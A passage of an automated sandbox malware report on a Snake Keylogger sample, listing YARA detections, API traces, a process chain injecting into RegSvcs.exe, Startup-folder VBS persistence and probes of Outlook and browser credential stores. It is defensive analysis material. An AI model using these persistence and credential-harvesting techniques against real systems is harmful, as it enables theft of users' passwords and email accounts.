              Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: RegSvcs.exe PID: 5444, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 6.2.name.exe.3910000.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.name.exe.3910000.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.name.exe.3910000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.name.exe.3910000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 9.2.name.exe.40c0000.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 9.2.name.exe.40c0000.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 9.2.name.exe.40c0000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 9.2.name.exe.40c0000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/10@3/3
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001937B5 GetLastError,FormatMessageW,0_2_001937B5
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001810BF AdjustTokenPrivileges,CloseHandle,0_2_001810BF
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_001816C3
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_003210BF AdjustTokenPrivileges,CloseHandle,6_2_003210BF
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_003216C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_003216C3
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_001951CD
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001AA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_001AA67C
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0019648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0019648E
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_001242A2
              Source: C:\Users\user\Desktop\PsBygexGwH.exeFile created: C:\Users\user\AppData\Local\directoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Users\user\Desktop\PsBygexGwH.exeFile created: C:\Users\user\AppData\Local\Temp\aut1009.tmpJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
              Source: PsBygexGwH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000279A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000027A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000278A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002A5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002A4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: PsBygexGwH.exeReversingLabs: Detection: 65%
              Source: PsBygexGwH.exeVirustotal: Detection: 70%
              Source: C:\Users\user\Desktop\PsBygexGwH.exeFile read: C:\Users\user\Desktop\PsBygexGwH.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\PsBygexGwH.exe "C:\Users\user\Desktop\PsBygexGwH.exe"
              Source: C:\Users\user\Desktop\PsBygexGwH.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\PsBygexGwH.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PsBygexGwH.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\Desktop\PsBygexGwH.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\PsBygexGwH.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PsBygexGwH.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: PsBygexGwH.exeStatic file information: File size 1130496 > 1048576
              Source: PsBygexGwH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: PsBygexGwH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: PsBygexGwH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: PsBygexGwH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: PsBygexGwH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: PsBygexGwH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: PsBygexGwH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: wntdll.pdbUGP source: name.exe, 00000006.00000003.2997844990.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2997193126.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3128087132.0000000004290000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3129130563.0000000004120000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: name.exe, 00000006.00000003.2997844990.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2997193126.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3128087132.0000000004290000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3129130563.0000000004120000.00000004.00001000.00020000.00000000.sdmp
              Source: PsBygexGwH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: PsBygexGwH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: PsBygexGwH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: PsBygexGwH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: PsBygexGwH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001242DE
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00140A76 push ecx; ret 0_2_00140A89
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E0A76 push ecx; ret 6_2_002E0A89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E9770 push esp; ret 7_2_008E9771
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7234A push edx; ret 7_2_04F7234B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AF9770 push esp; ret 10_2_00AF9771
              Source: C:\Users\user\Desktop\PsBygexGwH.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to dropped file
              Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0013F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0013F98E
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001B1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_001B1C41
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002DF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_002DF98E
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00351C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00351C41
              Source: C:\Users\user\Desktop\PsBygexGwH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
